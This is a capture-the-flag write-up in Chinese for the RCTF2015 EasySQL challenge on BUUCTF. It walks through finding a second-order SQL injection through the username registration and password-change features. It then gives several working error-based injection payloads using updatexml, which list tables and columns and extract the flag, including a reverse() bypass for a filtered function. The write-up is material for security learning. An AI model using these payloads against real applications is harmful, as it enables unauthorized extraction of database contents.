[buuctf][RCTF2015]EasySQL

[RCTF2015]EasySQL

---

• 二次注入
• 报错注入

---

1. 进去后是个登陆框，可以注册用户。首先这种猜测是二次注入，注册了admin’#用户,进去后有个改密码的操作，更加坚信了是个二次注入，但是并没有起到效果。
2. 因为并不清楚sql语句的闭合方式，所以重新注册一个admin"#,登陆后也没有起到作用。
3. 注册admin\,登陆进去后修改密码，结果出现报错。

可以看到原语句中的username是双引号闭合的，所以单引号注册的账号是不起作用的.由此推断，我们注册admin"#因为闭合语句且将后面进行了注释，所以是可以sql语句会变为更改admin的语句。
由此，修改admin"#作为admin的密码登陆。
由此证实我们的判断。但是这道题不是一道提权的问题，虽然登陆了admin用户但是并没有什么结果。然后我们将注意力放在那个修改密码报错的地方。
设想可以注册一个用于报错的用户登陆，来修改密码的地方进行报错注入，然后显示出需要的内容。

3. 在注册页面fuzz一下过滤的字符
   

4. 测试

username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#&password=1&email=1

username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=‘flag’))),1))#&password=1&email=1

username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag))),1))#&password=1&email=1

发现flag不全，且说flag不在这儿，那么试试其他表。

username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=‘users’))),1))#&password=1&email=1

username=xxx"||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(’^f’))),1))#&password=1&email=1

显示位不够用，但是过滤了right。可以使用reverse()

username=xxx"||(updatexml(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp(’^f’)))),1))#&password=1&email=1